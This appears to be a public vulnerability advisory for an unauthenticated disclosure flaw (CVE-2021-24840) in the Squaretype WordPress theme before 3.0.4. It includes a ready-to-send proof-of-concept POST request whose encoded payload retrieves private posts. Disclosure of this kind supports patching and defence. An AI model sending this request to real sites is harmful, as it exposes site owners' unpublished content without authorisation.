Squaretype Modern Blog < 3.0.4 – Unauthenticated Private/Schedule Posts Disclosure | CVE 2021-24840 | Theme Vulnerabilities

Description

The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts to display in one of its REST endpoint, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request.

Proof of Concept

POST /wp-json/csco/v1/more-posts
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

action=csco_ajax_load_more&page=1&posts_per_page=10&query_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d

Affects Themes

Fixed in 3.0.4

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Emil Kylander Edwartz

Submitter

Emil Kylander Edwartz

Submitter website

https://emilkylander.se

Submitter twitter

Verified

Yes

WPVDB ID

971302fd-4e8b-4c6a-818f-3a42c7fb83ef

Timeline

Publicly Published

2021-10-11 (about 4 years ago)

Added

2021-10-11 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-01-10

Title

Contact Form 7 – Dynamic Text Extension < 4.2.0 - Insecure Direct Object Reference

Published

2023-06-07

Title

Directorist < 7.5.5 - Subscriber+ Insecure Direct Object Reference to Arbitrary Post Deletion

Published

2024-06-21

Title

Bricks Builder < 1.9.9 - Insecure Direct Object Reference

Published

2025-01-31

Title

WP Job Portal < 2.2.7 - Insecure Direct Object Reference to Unauthenticated Arbitrary Resume Download

Published

2024-01-10

Title

WP Customer Area < 8.2.1 - Subscriber+ Account Address Leak